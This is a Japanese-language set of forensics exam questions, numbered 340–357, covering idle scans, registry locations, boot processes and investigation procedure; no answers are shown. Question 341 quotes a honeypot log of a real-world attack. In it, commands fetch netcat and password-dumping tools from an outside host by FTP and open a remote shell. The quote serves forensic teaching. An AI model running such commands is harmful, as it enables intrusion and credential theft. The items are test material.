質問340
Windows XPのブート終了時に、ログオンダイアログボックスを初期化するために処理されるファイルは何ですか？

質問341
以下の抜粋は、lab.wiretrip.netでホストされていたハニーポットのログから抜粋したものです。Snort は、213.116.251.162 からの Unicode 攻撃を報告しました。ファイルパーミッションの正規化の脆弱性（UNICODE攻撃）により、通常はスクリプトを実行する権利を持っていない任意のフォルダでスクリプトが実行される可能性があります。攻撃者は Unicode 攻撃を試み、最終的に boot.ini の表示に成功する。
そして、msadcs.dllを経由してRDSで遊ぶことに切り替える。RDSの脆弱性により、悪意のあるユーザーはIISサーバー上でシェルコマンド（CMD.EXEなど）を実行するSQL文を構築することができる。攻撃者は、簡単なクエリを実行してディレクトリが存在することを発見し、msadcs.dllへのクエリで正しく機能していることを確認する。攻撃者はRDSクエリを実行し、以下のようなコマンドを実行します。
"cmd1.exe /c open 213.116.251.162 >ftpcom"
"cmd1.exe /c echo johna2k >>ftpcom"
"cmd1.exe /c echo haxedj00 >>ftpcom"
"cmd1.exe /c echo get nc.exe >>ftpcom"
"cmd1.exe /c echo get pdump.exe >>ftpcom"
"cmd1.exe /c echo get samdump.dll >>ftpcom"
"cmd1.exe /c echo quit >>ftpcom"
"cmd1.exe /c ftp -s:ftpcom"
"cmd1.exe /c nc -l -p 6969 -e cmd1.exe"
与えられた搾取から何が推測できますか？

質問342
Office文書（ワード、エクセル、パワーポイント）には、その文書を作成したマシンのMAC（一意の識別子）を追跡できるコードが含まれている。このコードは何と呼ばれているのだろうか？

質問343
ブラックベリーの電子メールはすべて、最終的にどのRIM独自のメカニズムを通じて送受信されるか？

質問344
Windowsベースのサーバーで実行されているすべてのネットワークサービスを表示するコマンドはどれですか？

質問345
調査担当者が仮想マシンのインスタンスを取得し、フォレンジック調査プロセスを開始できるクラウドモデルはどれですか？

質問346
アイドリング状態」とは？

質問347
履歴、キャッシュ、クッキーを含む閲覧記録を保存するために、ESE（Extensible Storage Engine）データベース形式を使用しているウェブブラウザは次のうちどれですか？

質問348
ファイルアロケーションテーブルの最初の予約セクタの名前は？

質問349
令状を取得する際に重要なこと：

質問350
なぜLinux/Unixベースのコンピュータの方がWindowsコンピュータよりもアイドルスキャンに適しているのですか？

質問351
論理ファイルシステムのエラーを修復するのに役立つWindowsユーティリティはどれですか？

質問352
Linuxのブートプロセスで、システムのハードウェアを初期化するステージはどれか？

質問353
パスワードキーパーはどのような暗号化技術を使用していますか。

質問354
サイリーはフロリダ州のある組織で発生したネットワーク侵入事件を調査している。彼女は、侵入者がIPパケットでファイアウォールに負荷をかけることで、会社のファイアウォールにアクセスできたことを発見する。サイリーは調査を通じて、侵入者が会社の電話システムにハッキングし、PBXシステムのハードディスクを使って共有音楽ファイルを保存していることを突き止めた。会社のPBXシステムに対するこの攻撃は何と呼ばれるでしょうか？

質問355
次のディレクトリには何が保存されていますか？HKLMSECURITYPolicySecrets

質問356
攻撃者のコンピューターがIDLEスキャンで開いているポートのゾンビ・コンピューターにIPID 31400を送信した場合、どのような反応が返ってくるでしょうか？

質問357
クリスはあるクライアントから報告されたハッキング事件の調査を依頼された。同社は、この攻撃に内部の共犯者が関与していると疑っている。インシデント現場に到着すると、クリスは物理的なエリアを確保し、目視で現場を記録する。ケーブルを外す前に、すべてのケーブルとコネクタにラベルを貼る。次の一連の出来事は何だと思いますか？